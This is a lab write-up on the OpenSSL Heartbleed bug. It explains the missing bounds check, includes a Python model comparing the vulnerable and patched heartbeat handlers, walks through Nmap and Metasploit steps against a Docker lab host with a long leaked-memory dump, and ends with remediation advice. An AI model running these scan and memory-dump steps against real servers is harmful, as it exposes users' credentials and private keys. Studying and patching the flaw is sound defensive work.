OpenSSL

Introduction to OpenSSL
OpenSSL (from Open Secure Sockets Layer) is an open-source software library that applications use to communicate securely over computer networks: it protects traffic against eavesdropping and lets each endpoint verify the identity of the peer it is talking to. It is widely deployed on web servers across the Internet.

The OpenSSL package has three main parts: the SSL/TLS protocol library, the command-line applications, and the cryptographic algorithm library. As a cryptography-based development kit it is both powerful and comprehensive: it implements the major cryptographic algorithms, the usual key and certificate encapsulation and management functions, and the SSL/TLS protocol itself, and it ships a rich set of command-line tools for testing and other purposes.

Heartbleed

Heartbleed is a security bug in the OpenSSL cryptography library, which is widely used to implement the Transport Layer Security (TLS) protocol on the Internet. It was introduced into the software in 2012 and first disclosed publicly in April 2014. Any endpoint running a flawed OpenSSL build, whether server or client, can be attacked. The cause is missing input validation (a missing bounds check) in the implementation of the TLS heartbeat extension, which is where the name comes from. The bug is a buffer over-read: more data can be read than the caller should be allowed to read.

Vulnerability description

The serious flaw behind Heartbleed (CVE-2014-0160) is a missing bounds check: in tls1_process_heartbeat() the payload_length field taken from the attacker's heartbeat message is passed to memcpy() as the number of bytes to copy, without first checking that the received record actually contains that many bytes. The length field is 16 bits wide, so a heartbeat that carries a few bytes but claims up to 65535 makes the victim allocate a reply buffer, copy up to 64KB of whatever lies beyond the request in its own heap into it, and send that buffer back. Each request leaks a fresh 64KB of process memory, and the attacker can repeat it as often as desired.

Root cause

Heartbleed takes its name from the Heartbeat extension of TLS and DTLS (RFC 6520) in which the bug sits. Heartbeat gives TLS/DTLS a simple keep-alive: one side sends a payload and the peer echoes it back. OpenSSL 1.0.1 through 1.0.1f and 1.0.2-beta1 built that echo from the advertised payload length without comparing it to the length of the record actually received, so an attacker can read memory from a connected client or server and obtain not only confidential plaintext handled by the process but also the private key that protects the connection. The fix in 1.0.1g adds the missing comparison and silently discards any heartbeat whose claimed payload plus header and padding exceeds the record length.
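The following is an added illustration, not OpenSSL's code: a Python transliteration of the control flow of tls1_process_heartbeat() in ssl/t1_lib.c, once as shipped in 1.0.1f and once with the 1.0.1g check, run over a constructed byte string that stands in for the process heap. The heartbeat record sits at the front of that "heap" and is followed by made-up data (a cookie and a key fragment) that a correct implementation must never copy into the reply.

```python
"""Model of the heartbeat handling behind CVE-2014-0160. Added example: this
is a Python transliteration of the control flow of tls1_process_heartbeat()
in OpenSSL's ssl/t1_lib.c, not OpenSSL's code. A bytes object stands in for
the process heap: the heartbeat record sits at the front and is followed by
unrelated data (a constructed cookie and key fragment) that a correct
implementation must never copy into the reply.
"""
import struct
from typing import Optional

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16   # RFC 6520: at least 16 bytes of padding follow the payload


def build_heartbeat(claimed_len: int, payload: bytes) -> bytes:
    """HeartbeatMessage: type(1) | payload_length(2) | payload | padding.

    claimed_len goes into the length field regardless of len(payload),
    so a caller can claim far more payload than it actually sends.
    """
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * PADDING


def process_heartbeat_vulnerable(heap: bytes, rec_off: int, rec_len: int) -> Optional[bytes]:
    """OpenSSL 1.0.1f: trusts payload_length and never consults rec_len."""
    p = rec_off
    hbtype = heap[p]
    payload = struct.unpack_from("!H", heap, p + 1)[0]     # n2s(p, payload)
    pl = p + 3
    if hbtype != HB_REQUEST:
        return None
    # memcpy(bp, pl, payload): copies `payload` bytes from the request,
    # however many the record really held. In C this reads adjacent heap
    # memory; here the slice walks past the record into the rest of `heap`
    # (a Python slice clamps at the end instead of faulting).
    leaked = heap[pl:pl + payload]
    return struct.pack("!BH", HB_RESPONSE, payload) + leaked + b"\x00" * PADDING


def process_heartbeat_fixed(heap: bytes, rec_off: int, rec_len: int) -> Optional[bytes]:
    """OpenSSL 1.0.1g: discard any message the record cannot actually contain."""
    if 1 + 2 + PADDING > rec_len:
        return None                             # silently discard
    p = rec_off
    hbtype = heap[p]
    payload = struct.unpack_from("!H", heap, p + 1)[0]
    if 1 + 2 + payload + PADDING > rec_len:
        return None                             # silently discard, RFC 6520 section 4
    pl = p + 3
    if hbtype != HB_REQUEST:
        return None
    return struct.pack("!BH", HB_RESPONSE, payload) + heap[pl:pl + payload] + b"\x00" * PADDING


def demo() -> dict:
    """Run both handlers over a constructed heap; report what each returned."""
    secret = b"session=9f1c2ab7; -----BEGIN RSA PRIVATE KEY-----"   # constructed, not real
    request = build_heartbeat(claimed_len=0x4000, payload=b"hb?")    # claims 16384, carries 3
    heap = request + secret + b"\x00" * 64
    vuln = process_heartbeat_vulnerable(heap, 0, len(request))
    fixed = process_heartbeat_fixed(heap, 0, len(request))
    return {
        "vulnerable_leaks_secret": vuln is not None and secret in vuln,
        "vulnerable_response_len": len(vuln) if vuln else 0,
        "fixed_response": fixed,
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable handler answers the 22-byte request with a reply that contains everything after the three-byte header, secret included; the fixed handler returns nothing because 1 + 2 + 16384 + 16 is larger than the 22 bytes that arrived. An honest heartbeat (claimed length equal to the real payload) is echoed by both, which is why the check does not break legitimate keep-alives.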

Affected versions

Affected OpenSSL versions
Last updated 9 April 2014, per the Heartbleed and OpenSSL websites.

Affected:

OpenSSL 1.0.2-beta (beta1)
OpenSSL 1.0.1 through OpenSSL 1.0.1f

unless the operating system vendor has shipped a patch for CVE-2014-0160 without changing the library version, as Debian, Red Hat Enterprise Linux (and derivatives such as CentOS and Amazon Linux) and Ubuntu (and derivatives such as Linux Mint) did. On those systems the version string alone is not a reliable indicator: check the package changelog for a CVE-2014-0160 backport, or probe the service directly as done below.
Not affected:

OpenSSL 1.0.2-beta2 (not yet released at the time)
OpenSSL 1.0.1g
OpenSSL 1.0.0 (and the 1.0.0 branch)
OpenSSL 0.9.8 (and the 0.9.8 branch)

To fix the issue, server administrators should either upgrade to 1.0.1g or recompile OpenSSL with the -DOPENSSL_NO_HEARTBEATS option, which disables the vulnerable feature, until the server software can be updated.

Reproduction

Environment

Target: CentOS 7, 192.168.0.66

Attacker: Kali, 192.168.0.128
Make sure the two machines can reach each other over the network.

1. On the target host, find the CVE-2014-0160 directory of the vulnerability environment, change into it, and run docker-compose up -d to start the environment

ls # list the vulnerability directories


Enter the openssl directory, then the CVE-2014-0160 environment, and start it:

cd openssl
ls
cd CVE-2014-0160
docker-compose up -d


I had already pulled these images earlier, so docker-compose up -d simply reports done.

2. Check that the container is running

docker ps # shows the running container and its published port (8443 here)

Reproduction steps

Information gathering

1. Scan the target with Nmap to find the open port and the service behind it (here the vulnerable HTTPS service listens on 8443).

2. Run Nmap's ssl-heartbleed NSE script against port 8443; it reports the host as VULNERABLE when the heartbeat over-read succeeds.

Attacking with the Metasploit Framework

Start msfconsole

msfconsole

1. Search for the relevant module

search heartbleed

2. Verify the vulnerability. Nmap already flagged port 8443, so confirm it again with the Metasploit scanner module:

use auxiliary/scanner/ssl/openssl_heartbleed

3. The module can equally be selected by its index in the search results (1 here; the index depends on the Metasploit version and the search output, so check the number shown before using it):

use 1

4. Show the module options

show options

5. Configure the options
Set every option that is marked required but has no current value. Here only RHOSTS (the target IP, i.e. the host being attacked) needs to be set:

set RHOSTS 192.168.0.66

The vulnerable service does not listen on the default 443, so set the port the exploit should use:

set RPORT 8443

Enable verbose output:

set VERBOSE true

VERBOSE makes the module print the printable part of the leaked memory; with the default SCAN action it otherwise only reports whether the host is vulnerable. The module also offers DUMP and KEYS actions, which save the raw leak to loot and attempt to recover the server's RSA private key from it.

6. Launch the attack

run

The module now shows 64KB of the target's memory per heartbeat (if a user happens to be logging in to the web application at that moment, their credentials can show up in the leak in plaintext). In the output below the printable part already contains a fragment of a SOAP request body, an HTTP/1.1 404 response line, the Docker-network address 172.22.0.1 and the attacker's own 192.168.0.128.


```
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 192.168.0.66:8443     - Leaking heartbeat response #1
[*] 192.168.0.66:8443     - Sending Client Hello...
[*] 192.168.0.66:8443     - SSL record #1:
[*] 192.168.0.66:8443     -     Type:    22
[*] 192.168.0.66:8443     -     Version: 0x0301
[*] 192.168.0.66:8443     -     Length:  86
[*] 192.168.0.66:8443     -     Handshake #1:
[*] 192.168.0.66:8443     -         Length: 82
[*] 192.168.0.66:8443     -         Type:   Server Hello (2)
[*] 192.168.0.66:8443     -         Server Hello Version:           0x0301
[*] 192.168.0.66:8443     -         Server Hello random data:       648c88db9180cea037bc9f92497834aadb7a77c12a8703c5562c9626b3242f88
[*] 192.168.0.66:8443     -         Server Hello Session ID length: 32
[*] 192.168.0.66:8443     -         Server Hello Session ID:        0f4d1f4385cfe1eae3dd2607deda20fcbba9d771880eb68fea4973a07a2f027e
[*] 192.168.0.66:8443     - SSL record #2:
[*] 192.168.0.66:8443     -     Type:    22
[*] 192.168.0.66:8443     -     Version: 0x0301
[*] 192.168.0.66:8443     -     Length:  822
[*] 192.168.0.66:8443     -     Handshake #1:
[*] 192.168.0.66:8443     -         Length: 818
[*] 192.168.0.66:8443     -         Type:   Certificate Data (11)
[*] 192.168.0.66:8443     -         Certificates length: 815
[*] 192.168.0.66:8443     -         Data length: 818
[*] 192.168.0.66:8443     -         Certificate #1:
[*] 192.168.0.66:8443     -             Certificate #1: Length: 812
[*] 192.168.0.66:8443     -             Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x000055ea2e73cfd0>, not_before=2020-08-09 17:03:46 UTC, not_after=2021-08-09 17:03:46 UTC>
[*] 192.168.0.66:8443     - SSL record #3:
[*] 192.168.0.66:8443     -     Type:    22
[*] 192.168.0.66:8443     -     Version: 0x0301
[*] 192.168.0.66:8443     -     Length:  331
[*] 192.168.0.66:8443     -     Handshake #1:
[*] 192.168.0.66:8443     -         Length: 327
[*] 192.168.0.66:8443     -         Type:   Server Key Exchange (12)
[*] 192.168.0.66:8443     - SSL record #4:
[*] 192.168.0.66:8443     -     Type:    22
[*] 192.168.0.66:8443     -     Version: 0x0301
[*] 192.168.0.66:8443     -     Length:  4
[*] 192.168.0.66:8443     -     Handshake #1:
[*] 192.168.0.66:8443     -         Length: 0
[*] 192.168.0.66:8443     -         Type:   Server Hello Done (14)
[*] 192.168.0.66:8443     - Sending Heartbeat...
[*] 192.168.0.66:8443     - Heartbeat response, 65535 bytes
[+] 192.168.0.66:8443     - Heartbeat response with leak, 65535 bytes
[*] 192.168.0.66:8443     - Printable info leaked:
......d..@......<<...3......E..X..L..{..f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................w.....#.'.g.@.r.v.........8.........2.....E.D.......Q.......P.=...<.......A...............................#.............0.................................................+............-.....3.&.$... .T"...<..f.TG>...[).!..r....y..W...~..............................................................................................................................dObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>.MT..A...m.zm..J..................................................................................................................................... repeated 15476 times .....................................................................................................................................@..................................................................................................................................... 
repeated 16122 times .....................................................................................................................................@.........................................................................................................................................................................................................................................................................................................................................`...\U......\U....................................................................................................................................................................................................................................................................Sy..{.......s.t.Gn.....D.....+..gL.]E..uh....L.V.n..t7.d..T&...q)W(.g..c.;.........V..>.....#ZJ........e.$...z.(.l%..R.dCT 9P...u.+)..!....i%.A...~S..JM._...e.r"..oA...rwQ..W..ymKc.N\.^FB.d.@..+..x..,Cv.f..|..{..........=..W..s....3................R....`........!...........\U..................!...........\U...r..\U..........!........o..\U......\U.. ...............d.d?.qo%.c..g^.......b..~~..-bNlF..\..39@]FO..N..Pv..._...7..F%...fY_...q|yL...+5........jsKz...'.b9..RG.*TuZ:...g...A....pg............................................................................................................................................!...........\U......\U..................p...\U......\U..........................................................................................................................................................................................................................................................!...................\U..qj.bI....Fx....a .$.|J..68......L..&.<8 .Z.E..2.^.?.cK.sU.@.f~.w`Iyi...,^.f.3.%P.Y..|..[.d.$.S.B.4.) HG.j.s;...<............u.4."....R..fD.M.....Ow.c.Y..J..B......0....V..D...i..l........ 
.G{.......c.$.?.Q.8.>a.b*.w....=..P.....^.....t/......;...8.................!...........\U......\U....................................................................................................................................................................................................................................................;...8.............................\U......\U........!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I............................\U..................&..o.W.....$%....50..P....O.E../.a....^..<.I....~B2..[m.S9.b.5.....*...ZC..8.e.2..Y..C].S.....9..]y.#..7.~{.D..f.......7.........l.............a..l.!./u|.5.O..5...4.-....qw...%.B.R.....Ic...,*..6..`.b.mZ..P....(...`..@+...0....................x....."w.y{.p.0.[.#..2.S.....=......G..S............BG..S.~~...k~.V..{..\.n.t..p.D...f..t.H&.sP...&.'....!..lP3.z..R...6T.....,......v...ba..8.v$..c1....Fg.k..r.....6.|..m.......A...+.m..bo..ET.W>..`v...zW...s.....;.I).....$...FO...SN...rWL..-..5$..{...................-3..1c.mt&+..y...;.V.......!Vhn.'.&..^IBW...e..?......3..M....[.........)..?.w.\V.;....H.+.l7R..u..U..S.$.^4KV}d7<>.P...............u.4."....R..fD.M.....Ow.c.Y..J..B......0....V..D...i..l........ 
.G{.......c.$.?.Q.8.>a.b*.w....=..P.....^.....t/......;...8.................m..U`.W.....O.>c.....E^X4........kr[..:.1...z[..x.W].........f...3h.qS.&K.(A*q*...].tx.b....X........Np....l.F...5....~..Z2.D..$........................................................................................................................................q...............0...\U......!...............\U.............................................U..h7............................\U......\U........!.3Xhy.4.....r.....h.d..b........).......3.....&......IE...c,8.T.~..H.P.{y.....CK.,!&..;..vw....H.C...q....%e..{.XT.jq.R.r.....RHw..57.COlB..|......@...*.G(3..-N..P....mLO..]./.,9..|..+2.Lh..q..dF.m...'.....`...S.8........Q...U.0....I................ /..\U......\U..........................................................................................................................................................................................................................................................................................................................................................................................................q...................\U......!...............\U................................................H1........................`...\U......\U..................................................................................................................................... repeated 248 times .....................................................................................................................................@...\U......\U....L...:#p.y..n......'O..F.....=.....N..w%......eu...BU>.O.....F'..G..........Y..o........Y.*#A.....F.uO.u(B..;..............................................\U..I.....x....r...)..m...V..Q.v....o..%...7..S...........R.p."..A....1... ^..P..b|....<.8.....E.^...6]V%.7..Obo...BF+B.................\U...........pi.....hmi......ui.....Pui......Xi......Wi......bi......ai......ai..... 
oi......Vi......`i.....(pi......li......si.....@si......Ri......Qi.....pni......ki.....xNi......pi......mi......ti.....Hti......Vi......Ui......ei.....(ei.....8\i......[i......ni.....Xki......Ti..... di......Zi......oi.....`li......ni......ji......Li.....hLi.....@Ri.....8Qi..... Ni......Qi......Pi......Mi......Mi......Li.........................................................\U..@...\U..........................................................1............ ...4i......u..\U......\U......\U............e......................!..........\U......\U..........c)..\U......................\U..........................................`...\U..........................................................................@...\U......{....y.D^....(.......................#..\U..........................................................@...\U...................r..\U............................Z..............................@......................................................................................................................................................................@...\U..................................................................................................................................................................................q...........\U......\U......................\U..................................................................Q.........D.......D.........\U......\U..HTTP/1.1 404 Not..................................................................................................................................... 
repeated 4090 times .....................................................................................................................................\U..jfx...&.P................|D......|D.....p...............................................................................................................................................................................................................................................`...............................................................................................................................................................................................................................................P...............0...\U......\U..............................\U..........H...\U..........@...\U..............................\U..y...........................\U..................A...\U..........172.22.0.1i.....`...\U...f..\U....................................................$.................\U..@...\U..@...\U..................@...\U..@...\U..........................................@...\U...........................................................................................ei.....1........|D......|D.............................q...................\U..........................................................................................a.......0...\U......\U..........................................................................1...........................................\U..1.......................................0.......A.........a..................... ...\U............T.............1........,..\U......\U..................0.......1........0..\U...|D.....................0.......0.......`...\U......\U..........................1........................................3..\U..1.......<....0.y..._...u.%bw+s.y.U7.v_......\U..1....................................... 
.......!...........\U..................!...........\U......\U....................................................................................................................................................................................................................................................;...8.............................\U......\U..........................................................................................................!........}D......}D......ui.....Pui......Xi......Wi......bi......ai......ai..... oi......Vi......`i.....(pi......li......si.....@si......Ri......Qi.....pni......ki.....xNi......pi......mi......ti.....Hti......Vi......Ui......ei.....(ei.....8\i......[i............................. ...................\U......\U..............................................................................................................................................................................................................................................\U..........................P...\U..............\U..............\U..............................\U..o...............i...\U..P...\U......................\U..........172.22.0.1......`...\U...f..\U....................................................$.....................@...\U..@...\U..................@...\U..@...\U..........................................@...\U..................................................@...........\U..................................................a...........\U.. ...\U..........A.......<....0.y..._...u.%bw+s.y.U7.v_....!.. ..4H....0.@.......!...............................!.......I...........\U..XU......!.........6.....jfx...&...~.....1.......Q%c.............................0.......A...........\U.. 
...\U..................................@...............`...\U......\U......................................................................................................................................................................................................................\U...........~a.........\U......\U......................\U.................................. ...\U..................`o..\U..............................................\U......................\U......................s/.. ...\U......\U..................p...\U......\U...................................................................................................................................................................................................................................~a..... ...\U......\U......................\U......................................\U......................\U..........................................@...\U..................0r..\U..........................@...\U...!..\U....................D.......D..... ...\U.. ...\U..................Pr..\U...|D.........................\U..........P...\U..Pr..\U..................0.......0........r..\U..................................1.......P...\U...|D.............................0...........\U..................................A...........\U......\U.. ....... ....... ...\U..........`.......0........(..\U..\.....J.%.!......].%..q.........0.......p(..\U..............................................\U... 
..\U......................\U..!...........\U......\U..P...................\U..@...\U......................\U......\U..............................\U.............................................................................................................................................................................................................................@.................................................................................................................................................................................................................................a...........\U...|D......................................................................................(..\U......\U..........................................................................................................................................................A...............................................................q...................\U...................................................................................................................................................................................................................................................................................................................................................................Fb.................................................\U...u..\U..................................................................0~D.....0~D......................................................................................................................................................................................................................vi.............@}D.....@}D.....hmi......pi......Wi......bi......ai......mi......pi......Ui......ei.....(ei.....8\i..........G.I|{.~3...1........|D.....`...\U..ps..\U...o..\U..........@...........\U..@...\U..................................................@%..\U......\U.......................................................................
.............................................................. repeated 400 times .....................................................................................................................................a........~a..... ...\U..................p...\U..................P...\U..................................@s..\U.. }D.....................0.......0...........\U..................................1.......@s..\U...|D.....................................p...\U......\U..................................................................................................................................... repeated 572 times .....................................................................................................................................d.......7...Ix4..zw.*...V,.&.$/.d..@......<<...3......E..X..L..{............`)..\U..H.......................X@..............................h)..\U..h)..\U...........................................)..\U...)..\U..............................................................\U..........0...\U..................................................................................................................................... repeated 217 times .....................................................................................................................................pi.................\U...!......................................................................................................................................................................................................................................................1.......Q%c.............................0.......!........3..\U... ..\U.. ....... ...........\U......\U....................................................................................................................................................................................................................................................;...8.................!....... 
...\U......\U......................................................................................................................................................................................................................................................................................\U......\U..................................................................................................................................... repeated 240 times .....................................................................................................................................!.......p...\U......\U....................................................................................................................................................................................................................................................;...8.................1...........\U..................................................Nj..\U..................0...\U..........p...\U......\U....a.......................a.......................a..................................................................... .a.............................................................1...................\U..................................................................................................................................... repeated 2472 times .....................................................................................................................................P...\U......\U..........................0...\U..............\U..............\U..............................\U..k.......................0...\U..................A...\U..........172.22.0.1128...`...\U...f..\U.................................................. 
.$.................\U..@...\U..@...\U..................@...\U..@...\U..........................................@...\U..............\U......\U..............................................\U......\U......\U......................................................................\U..@...\U..........................@...\U..............................\U..............................\U..................i...\U..@...\U......................\U..........192.168.0.128.......\U...f..\U....................................................$.........................\U..@...\U...................@..........\U..................$.......................@...\U..........................................................................................................................................................0z..\U......\U..f....m.b[-......0.......0...............................................1...........\U...|D.......................................D.......D.........\U......\U..0.......A...........\U......\U..........!.......@...\U..@...\U..p.......0........1..\U......\U....R..... .R..... .R.....Q...........\U..@...\U..........................!...........\U......\U...................................................................................................................................................................................................................................................................}D......'..\U..................................................................................................................................... repeated 200 times .....................................................................................................................................0...\U..`...\U..........................................................................1...........\U..P...\U....!.. ..4H....0.P.......0...........\U..................................A...........\U..P...\U..................0....... 
...........\U..................q........}D......}D.....................0.......@...............................................@...\U..........0.......P...\U..\.....J.%.!......].%..q.........Q...........\U...|D.............................!........|D......1..\U..........P...........\U......\U..........................................................................................................................................................................................................................................................................................................................a...................\U..........................................................................1...........\U......\U..................0.......a........~a.....`...\U...................3..\U......................\U..........................Q...........\U......\U..................................................................................................................................................................................................................................................................................................................................P...\U......\U..........................................................................................................................................................................................................................1.......c 
O......5...L...h.......Iv..7..0.......1.......D.a........D1..Z.s&.%...#lN\..m.`.......1.......-j..Z..NIeQ.I..tr.........{(............1........|D.........\U..................0...............P...\U......\U........H8.d....6%0.......0...........\U..........................`.......0...........\U......\U..`...\U..@...\U..........1.......................................0.......a.......`...\U......\U..........................................................................Q...................\U..............................................................................................................................................................................................................................................................................................................................................\U..........................................................................................................................................................1.......................................0.......a...........\U......\U..........................................................................1...............................................1..........)b....0.x......!.. ..4H....0.0.......A...........\U..`...\U..p...\U......\U..................................P...\U......\U..........................................................................................................................................................!...........\U..0...\U.. ....... .......p...\U......................................\U..................................................................................................................................... repeated 400 times .....................................................................................................................................q........................................................................... ....M.C......&... 
....q.....Is.z/.~....{....y.D^....(..............................................................................,..........d.............................-..\U.......................................................................................................................... !..\U......\U..................................................................................................................................... repeated 409 times .....................................................................................................................................}D......}D.......!.. ..4H....0.........1...........\U..`...\U..................`.......0...........\U....#Nb........C.;..^.S(.)........0.......p...\U..................................1...........\U..0...\U...%bw+s.y.U7.v_..................0 ..\U......\U..........................................................................................................
[*] 192.168.0.66:8443     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > 
```

Remediation

OpenSSL versions affected by "Heartbleed" (CVE-2014-0160):

OpenSSL 1.0.2-beta
OpenSSL 1.0.1 through OpenSSL 1.0.1f

The blunt and effective fix is to upgrade OpenSSL.
Server administrators should move to 1.0.1g (or a distribution package that backports the fix), or rebuild OpenSSL with -DOPENSSL_NO_HEARTBEATS to disable the vulnerable feature until the server software can be updated. Because the bug may already have leaked the private key, upgrading alone is not enough:
1. Take the affected server offline so that it stops leaking sensitive data.
2. Stop the services linked against the old OpenSSL, upgrade OpenSSL, and restart them (a long-running process keeps the old library mapped until it is restarted).
3. Generate a new private key, since an attacker may have obtained the old one through the bug. Submit a certificate request for the new key to your CA and install the newly issued certificate on the server.
4. Bring the server back online.
5. Revoke the old certificate.
6. Invalidate existing session cookies.
7. Require users to change their passwords.
Heartbleed was found and patched more than eight years ago, yet many servers still remain vulnerable to it.
